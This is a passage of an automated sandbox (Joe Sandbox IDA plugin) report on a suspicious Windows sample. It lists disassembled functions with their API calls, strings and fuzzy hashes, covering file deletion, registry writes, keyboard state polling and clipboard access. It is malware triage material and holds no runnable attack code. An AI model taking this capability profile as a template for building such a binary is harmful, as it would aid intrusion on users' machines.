__swprintf.LIBCMT ref: 003CC8D3

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

__swprintf.LIBCMT ref: 003CC927

Part of subcall function 00383698: __woutput_l.LIBCMT ref: 003836F1

__swprintf.LIBCMT ref: 003CC975

Part of subcall function 00383698: __flsbuf.LIBCMT ref: 00383713
Part of subcall function 00383698: __flsbuf.LIBCMT ref: 0038372B

__swprintf.LIBCMT ref: 003CC9C4
__swprintf.LIBCMT ref: 003CCA13
__swprintf.LIBCMT ref: 003CCA62

Strings

%4d, xrefs: 003CC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 003CC88A
%02d, xrefs: 003CC91B, 003CC925, 003CC973, 003CC9C2, 003CCA11, 003CCA60

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
Instruction ID: e16c48491cee95dcb14b8ecef6b17fffa87df88b2bc20cacf8227015758be932
Opcode Fuzzy Hash: 6908b36f0e5886e14179796ef52bb8cdbc2cad817d85b455c86a04d4b348bfaa
Instruction Fuzzy Hash: C2A11EB1414344ABC712EF94C885EAFB7ECAF99704F40492EF595CB191EB35DA08CB62

Function 003CEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CEFB6
_wcscmp.LIBCMT ref: 003CEFCB
_wcscmp.LIBCMT ref: 003CEFE2
GetFileAttributesW.KERNEL32(?), ref: 003CEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 003CF00E
FindNextFileW.KERNEL32(00000000,?), ref: 003CF026
FindClose.KERNEL32(00000000), ref: 003CF031
FindFirstFileW.KERNEL32(*.*,?), ref: 003CF04D
_wcscmp.LIBCMT ref: 003CF074
_wcscmp.LIBCMT ref: 003CF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 003CF09D
SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF0C5
FindClose.KERNEL32(00000000), ref: 003CF0D2
FindClose.KERNEL32(00000000), ref: 003CF0E4

Strings

*.*, xrefs: 003CF048

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
Instruction ID: 62c06bf3e2beeefdd051011c2849bdfdc9a893b09839c69d217e6add4f1f6cd8
Opcode Fuzzy Hash: 57415eefaeaac96489a502d0ae17417fdfe58230a91f53d05506b9ea07ff7a58
Instruction Fuzzy Hash: DF3105365002686FCB26ABA0DC88FEE77AD9F45720F1042BAE800D6091DB70DE80CB55

Function 003766E1 Relevance: 27.1, Strings: 21, Instructions: 889COMMON

Download Yara Rule

Strings

CRLF), xrefs: 003B12C1
-es, xrefs: 003B12F2, 003B13AF
0F@, xrefs: 00376747
LF), xrefs: 003B12A4
UCP), xrefs: 003B110D
BSR_ANYCRLF), xrefs: 003B131E
ANYCRLF), xrefs: 003B12FB
NO_START_OPT), xrefs: 003B114F
pG@, xrefs: 00376751
0D@, xrefs: 00376733
_7, xrefs: 003B1465, 003B150C, 003B15B4
UTF16), xrefs: 003B10CF
LIMIT_MATCH=, xrefs: 003B1170
UTF), xrefs: 003B10FA
BSR_UNICODE), xrefs: 003B1338
3c7, xrefs: 003768FF
CR), xrefs: 003B1287
ANY), xrefs: 003B12DE
LIMIT_RECURSION=, xrefs: 003B11FC
NO_AUTO_POSSESS), xrefs: 003B112E
0E@, xrefs: 0037673D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID: -es$0D@$0E@$0F@$3c7$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG@$_7
API String ID: 0-239065333
Opcode ID: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
Instruction ID: 3c8ce6f38daeacb16a2c5e56dacd14d8b56b597aa3c79f7cc123968890f5d65e
Opcode Fuzzy Hash: c00b662749c4e886d738acb2feb1e2ff37ac35f36d51340f0ae70f3b008561c6
Instruction Fuzzy Hash: 6672AD71E006198BDB26CF59C8A17EEB7F5FF44314F54816AE909EB680E7349E81CB90

Function 003E0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,003EF910,00000000,?,00000000,?,?), ref: 003E09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003E0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003E0A92
RegCloseKey.ADVAPI32(?), ref: 003E0DB2
RegCloseKey.ADVAPI32(00000000), ref: 003E0DBF

Strings

REG_EXPAND_SZ, xrefs: 003E0A2F
REG_MULTI_SZ, xrefs: 003E0B7A
REG_DWORD, xrefs: 003E0C83
REG_QWORD, xrefs: 003E0D00
REG_BINARY, xrefs: 003E0D4D
REG_SZ, xrefs: 003E0AD0

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 08ef1afbe6e71a2dcb3bb76499cc221095104567aaefaf252b72925ec45eb514
Instruction ID: e2b8aa4084c12192a0151a2575a702e3e0af799f96e291798a7cf136fd89a66c
Opcode Fuzzy Hash: 08ef1afbe6e71a2dcb3bb76499cc221095104567aaefaf252b72925ec45eb514
Instruction Fuzzy Hash: 83026B756006519FCB16EF25C881E2AB7E9FF89324F05855DF8999B3A2CB70EC41CB81

Function 003CF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003CF113
_wcscmp.LIBCMT ref: 003CF128
_wcscmp.LIBCMT ref: 003CF13F

Part of subcall function 003C4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003C43A0

FindNextFileW.KERNEL32(00000000,?), ref: 003CF16E
FindClose.KERNEL32(00000000), ref: 003CF179
FindFirstFileW.KERNEL32(*.*,?), ref: 003CF195
_wcscmp.LIBCMT ref: 003CF1BC
_wcscmp.LIBCMT ref: 003CF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 003CF1E5
SetCurrentDirectoryW.KERNEL32(00418920), ref: 003CF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 003CF20D
FindClose.KERNEL32(00000000), ref: 003CF21A
FindClose.KERNEL32(00000000), ref: 003CF22C

Strings

*.*, xrefs: 003CF190

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
Instruction ID: 7000f4e104f9e9c6c7ce85e7f4f7c0bc7919bfd83d3326c331a01eb0e498d7be
Opcode Fuzzy Hash: e6c16b656fb82e5c0e8a5cdb2335e13af44fbe37b8e2c8016ec0c8aaf1b2e358
Instruction Fuzzy Hash: AF31073A5002596FCB22AB60EC58FEE77AE9F45320F1506B9E800E61D0DB70DF45CB54

Function 003CA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003CA20F
__swprintf.LIBCMT ref: 003CA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 003CA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003CA293
_memset.LIBCMT ref: 003CA2B2
_wcsncpy.LIBCMT ref: 003CA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003CA323
CloseHandle.KERNEL32(00000000), ref: 003CA32E
RemoveDirectoryW.KERNEL32(?), ref: 003CA337
CloseHandle.KERNEL32(00000000), ref: 003CA341

Strings

\, xrefs: 003CA247
\??\%s, xrefs: 003CA22B
:, xrefs: 003CA252

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
Instruction ID: ba1c5b4f21d56e6aa00b59bdf367cacd3d1b1439e6c6483b1a82b48e7abc9f9e
Opcode Fuzzy Hash: 9872d13a44a7b9782f8e673d55af4653718a6ed713b08fab56f19027709ac3af
Instruction Fuzzy Hash: B831C87590425DABDB22DFA0DC85FEB77BCEF88744F1041BAF508D6190E7709A448B25

Function 003C001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 003C0097
SetKeyboardState.USER32(?), ref: 003C0102
GetAsyncKeyState.USER32(000000A0), ref: 003C0122
GetKeyState.USER32(000000A0), ref: 003C0139
GetAsyncKeyState.USER32(000000A1), ref: 003C0168
GetKeyState.USER32(000000A1), ref: 003C0179
GetAsyncKeyState.USER32(00000011), ref: 003C01A5
GetKeyState.USER32(00000011), ref: 003C01B3
GetAsyncKeyState.USER32(00000012), ref: 003C01DC
GetKeyState.USER32(00000012), ref: 003C01EA
GetAsyncKeyState.USER32(0000005B), ref: 003C0213
GetKeyState.USER32(0000005B), ref: 003C0221

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
Instruction ID: b71b0a55b0dc8c633f166851dc64926a6d3f31064f5bcdad924b2fbee38c6101
Opcode Fuzzy Hash: 68d5755d5ad7b66de526a843ebbf08dd7a9bd275fb003ca6cacb2783cdd3fc1b
Instruction Fuzzy Hash: 7F51DB249047D899FB3BDBA08854FAABFB49F01380F09459E95C19A5C3DAA49F8CC761

Function 003E03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E04AC

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003E054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003E05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003E0822
RegCloseKey.ADVAPI32(00000000), ref: 003E082F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: e8d09048ab116e73aa3339ce169a06a52e0b50d5130b307db965b21a59102db9
Instruction ID: 828a36e16fb88f0a58a21f0a51bc54ec917977a3d4a679e1a1f6e4cfea3dd248
Opcode Fuzzy Hash: e8d09048ab116e73aa3339ce169a06a52e0b50d5130b307db965b21a59102db9
Instruction Fuzzy Hash: 46E16D71604250AFCB16DF25C891E2ABBE8FF89314F04C56DF84ADB2A2D670ED45CB91

Function 003D83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

CoInitialize.OLE32 ref: 003D8403
CoUninitialize.OLE32 ref: 003D840E
CoCreateInstance.OLE32(?,00000000,00000017,003F2BEC,?), ref: 003D846E
IIDFromString.OLE32(?,?), ref: 003D84E1
VariantInit.OLEAUT32(?), ref: 003D857B
VariantClear.OLEAUT32(?), ref: 003D85DC

Strings

NULL Pointer assignment, xrefs: 003D84B3
Invalid parameter, xrefs: 003D84FA
Failed to create object, xrefs: 003D8479, 003D852F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 9c9b1c01fd4972a6a64d7e92a9164071bf2f66634f0b09158ed5372fc1b84b85
Instruction ID: 6e24c6e979911c987482c2ea11a81094000eb65b6c591bddd86a6add62ab9566
Opcode Fuzzy Hash: 9c9b1c01fd4972a6a64d7e92a9164071bf2f66634f0b09158ed5372fc1b84b85
Instruction Fuzzy Hash: 9C61BF726083129FC712DF55E888F6AB7E9AF49714F00451EF9819B391CB70ED44CB92

Function 003D4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 003D418B
EmptyClipboard.USER32 ref: 003D4191
GlobalAlloc.KERNEL32(00000002,?), ref: 003D41A6
CloseClipboard.USER32 ref: 003D4245

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
Instruction ID: 4088fff98d02be1f3041d5c9050f016c83f5a3fbdc3d15d0c00f66168e5dc555
Opcode Fuzzy Hash: da733c82408ff578dafe1c13f336b1af5d76369d3b93f2395acf6021ac6dc786
Instruction Fuzzy Hash: 8D219C76600210DFDB22AF64EC49B6A7BACEF55710F10852AF946DF2A1DB70AD01CB54

Function 003C37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770

Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32

FindFirstFileW.KERNEL32(?,?), ref: 003C38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003C394B
MoveFileW.KERNEL32(?,?), ref: 003C395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003C397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 003C399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 003C39B9

Strings

\*.*, xrefs: 003C384E, 003C3857, 003C386C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
Instruction ID: e3daee18caa00cf050d1abb0e9299bb95ab89c6a1c6f994598ff05b19aa1b007
Opcode Fuzzy Hash: 8940847b610143af1ba85bb53ddfc5e8feced7696f664b6524489a18365fd69f
Instruction Fuzzy Hash: 9851AF3180414CAACF17EBA0D992EEDB778AF11304F60816DE402BB195EF706F09CB61

Function 003CF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003CF440
Sleep.KERNEL32(0000000A), ref: 003CF470
_wcscmp.LIBCMT ref: 003CF484
_wcscmp.LIBCMT ref: 003CF49F
FindNextFileW.KERNEL32(?,?), ref: 003CF53D
FindClose.KERNEL32(00000000), ref: 003CF553

Strings

*.*, xrefs: 003CF425

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
Instruction ID: 388de0495d87e7e9b1ff12d022555345d6957dc027297568e53c15a5af3a34dd
Opcode Fuzzy Hash: 83d50e86f1d64c051208fb3343a0abbfbf1e1dd0665e6210c3f743d2972c8f9d
Instruction Fuzzy Hash: 26417B7180021AAFCF16EF64CC45BEEBBB9FF05310F20456AE915A6190DB309E84CB50

Function 00373030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_7, xrefs: 00373322
3c7, xrefs: 00373225

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c7$_7
API String ID: 674341424-4188345352
Opcode ID: f333d9b06a81df03de374156e3d58d92094a66f0205518174126f6edddf0c3c7
Instruction ID: 4396b301f9ebcb378ce8d23b85c0be8ce73baa1e8d0e06f3d8945e85b43cdab7
Opcode Fuzzy Hash: f333d9b06a81df03de374156e3d58d92094a66f0205518174126f6edddf0c3c7
Instruction Fuzzy Hash: F022AF716083009FD726DF24C881BAFB7E8EF85714F04891DF59A9B291DB75E904CB92

Function 00375760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003758A5
_memmove.LIBCMT ref: 003758F5
_memmove.LIBCMT ref: 0037595B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b03adca078b824660d68d3d1193635ac3783ec62e6e9f43e3d8cc5247f038ac1
Instruction ID: 55de2f476eace020f7a57870936593ca772753d4b4c49dd93a55a4e120328e2d
Opcode Fuzzy Hash: b03adca078b824660d68d3d1193635ac3783ec62e6e9f43e3d8cc5247f038ac1
Instruction Fuzzy Hash: 4D129C70A00609EFCF19DFA4D981AEEB7F5FF48304F108569E44AEB650EB39A914CB50

Function 003C3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770

Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32

FindFirstFileW.KERNEL32(?,?), ref: 003C3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 003C3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 003C3BEA
FindClose.KERNEL32(00000000), ref: 003C3C01
FindClose.KERNEL32(00000000), ref: 003C3C0A

Strings

\*.*, xrefs: 003C3B5B

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

